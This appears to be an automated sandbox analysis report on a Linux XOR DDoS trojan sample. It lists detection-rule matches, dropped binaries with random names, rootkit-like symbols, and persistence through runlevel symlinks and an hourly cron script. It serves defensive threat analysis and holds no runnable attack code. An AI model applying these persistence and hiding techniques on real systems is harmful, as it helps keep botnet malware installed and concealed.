Source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/zetazkptwu, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/tudlcvpgbc, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/tudlcvpgbc, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/qjfxtxsijs, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/qjfxtxsijs, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /lib/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /lib/libudev.so, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/kmavqzvhro, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/kmavqzvhro, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/zyapsjpaje, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/zyapsjpaje, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/txflbjqefg, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/txflbjqefg, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/whtzopaggc, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/whtzopaggc, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/wrfeamwlub, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wrfeamwlub, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/wyyhrifhaz, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wyyhrifhaz, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/wgpgdetjwe, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wgpgdetjwe, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/yfiimchuiz, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/yfiimchuiz, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/qvilroogsz, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/qvilroogsz, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection

Source: dkuidbsedp	ELF static info symbol of initial sample: HideFile
Source: dkuidbsedp	ELF static info symbol of initial sample: HidePidPort
Source: dkuidbsedp	ELF static info symbol of initial sample: __after_morecore_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __free_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __malloc_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: dkuidbsedp	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: HideFile
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __free_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: qvilroogsz.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: HideFile
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __free_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wyyhrifhaz.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: HideFile
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __free_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wrfeamwlub.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: HideFile
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __free_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wgpgdetjwe.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: HideFile
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __free_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: zyapsjpaje.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: HideFile
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __free_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: yfiimchuiz.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: HideFile
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __free_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: txflbjqefg.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: HideFile
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __free_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: qjfxtxsijs.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: HideFile
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __free_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: tudlcvpgbc.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: HideFile
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __free_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: whtzopaggc.7.dr	ELF static info symbol of dropped file: __memalign_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: HideFile
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: HidePidPort
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __free_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __malloc_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: kmavqzvhro.7.dr	ELF static info symbol of dropped file: __memalign_hook

Source: classification engine

Classification label: mal100.troj.evad.lin@0/20@5/0

Source: /tmp/dkuidbsedp (PID: 9446)

/run/gcc.pid: vcgktyioiaixliwssuhhjmnsuaneafuy

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc1.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc2.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc3.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc4.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc5.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc.d/rc1.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc.d/rc2.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc.d/rc3.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc.d/rc4.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/rc.d/rc5.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedp			Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/rc1.d/S01dkuidbsedp -> ../init.d/dkuidbsedp			Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/rc2.d/S01dkuidbsedp -> ../init.d/dkuidbsedp			Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/rc3.d/S01dkuidbsedp -> ../init.d/dkuidbsedp			Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/rc4.d/S01dkuidbsedp -> ../init.d/dkuidbsedp			Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/rc5.d/S01dkuidbsedp -> ../init.d/dkuidbsedp			Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/cron.hourly/gcc.sh			Jump to behavior
Source: /bin/dash (PID: 9469)	File: /etc/crontab			Jump to behavior
Source: /bin/sed (PID: 9472)	File: /etc/crontab			Jump to behavior

Source: /tmp/dkuidbsedp (PID: 9446)	File written: /lib/libudev.so			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/qvilroogsz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/wyyhrifhaz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/wrfeamwlub			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/wgpgdetjwe			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/zyapsjpaje			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/yfiimchuiz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/txflbjqefg			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/qjfxtxsijs			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/tudlcvpgbc			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/whtzopaggc			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/kmavqzvhro			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File written: /usr/bin/zetazkptwu			Jump to dropped file

Source: /tmp/dkuidbsedp (PID: 9446)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Source: /tmp/dkuidbsedp (PID: 9446)	Reads from proc file: /proc/stat			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	Reads from proc file: /proc/meminfo			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	Reads from proc file: /proc/cpuinfo			Jump to behavior

Source: /usr/sbin/update-rc.d (PID: 9537)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/dkuidbsedp (PID: 9446)

Writes shell script file to disk with an unusual file extension: /etc/init.d/dkuidbsedp

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/dkuidbsedp (PID: 9446)	File: /etc/init.d/dkuidbsedp			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qvilroogsz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wyyhrifhaz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wrfeamwlub			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wgpgdetjwe			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/zyapsjpaje			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/yfiimchuiz			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/txflbjqefg			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qjfxtxsijs			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/tudlcvpgbc			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/whtzopaggc			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/kmavqzvhro			Jump to dropped file
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/zetazkptwu			Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/init.d/.depend.boot			Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/init.d/.depend.start			Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 9493)	File: /etc/init.d/.depend.stop			Jump to dropped file

Sample deletes itself

Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wgpgdetjwe			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/zyapsjpaje			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/yfiimchuiz			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/txflbjqefg			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qjfxtxsijs			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/tudlcvpgbc			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/whtzopaggc			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/kmavqzvhro			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/zetazkptwu			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/jvzzirmjsa			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/gkckltchoc			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/rlxosagpct			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/pnljtnsppb			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/lhyaaotaph			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/otigswehlv			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/thzryslebl			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/sunvkgnszw			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/yclsxhkbli			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/nvlkgshfzs			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wgerzwaeqg			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/chvtxqzhiw			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qwevskbjgs			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/kztofeuxtk			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/tihvbqlbyh			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/evsgasjgju			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/jyfcwmvcim			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/nwaorjvecz			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/cqsoclzfrt			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/udrzmjfbgf			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qwgryggbpq			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/thqvayvyih			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/fcpzadqmpt			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/ibtfyvoofm			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/tlayyibcia			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/dzlsbdiinr			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qwdfhkhfeq			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/ldaqsdrmbu			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/wuipuaslsy			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/uvaewfcsxa			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/bbynnggifo			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/lcbdpulcrs			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/vrbpjcuukk			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/potliirubi			Jump to behavior
Source: /tmp/dkuidbsedp (PID: 9446)	File: /usr/bin/qvavyybczk			Jump to behavior
Source: /usr/bin/qvilroogsz (PID: 9548)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /usr/bin/qvilroogsz (PID: 9559)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /usr/bin/qvilroogsz (PID: 9570)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /usr/bin/qvilroogsz (PID: 9581)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /usr/bin/qvilroogsz (PID: 9592)	File: /usr/bin/qvilroogsz			Jump to behavior
Source: /usr/bin/wyyhrifhaz (PID: 9603)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /usr/bin/wyyhrifhaz (PID: 9614)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /usr/bin/wyyhrifhaz (PID: 9626)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /usr/bin/wyyhrifhaz (PID: 9636)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /usr/bin/wyyhrifhaz (PID: 9647)	File: /usr/bin/wyyhrifhaz			Jump to behavior
Source: /usr/bin/wrfeamwlub (PID: 9658)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /usr/bin/wrfeamwlub (PID: 9669)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /usr/bin/wrfeamwlub (PID: 9680)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /usr/bin/wrfeamwlub (PID: 9691)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /usr/bin/wrfeamwlub (PID: 9702)	File: /usr/bin/wrfeamwlub			Jump to behavior
Source: /usr/bin/wgpgdetjwe (PID: 9713)	File: /usr/bin/wgpgdetjwe			Jump to behavior
Source: /usr/bin/wgpgdetjwe (PID: 9724)	File: /usr/bin/wgpgdetjwe			Jump to behavior
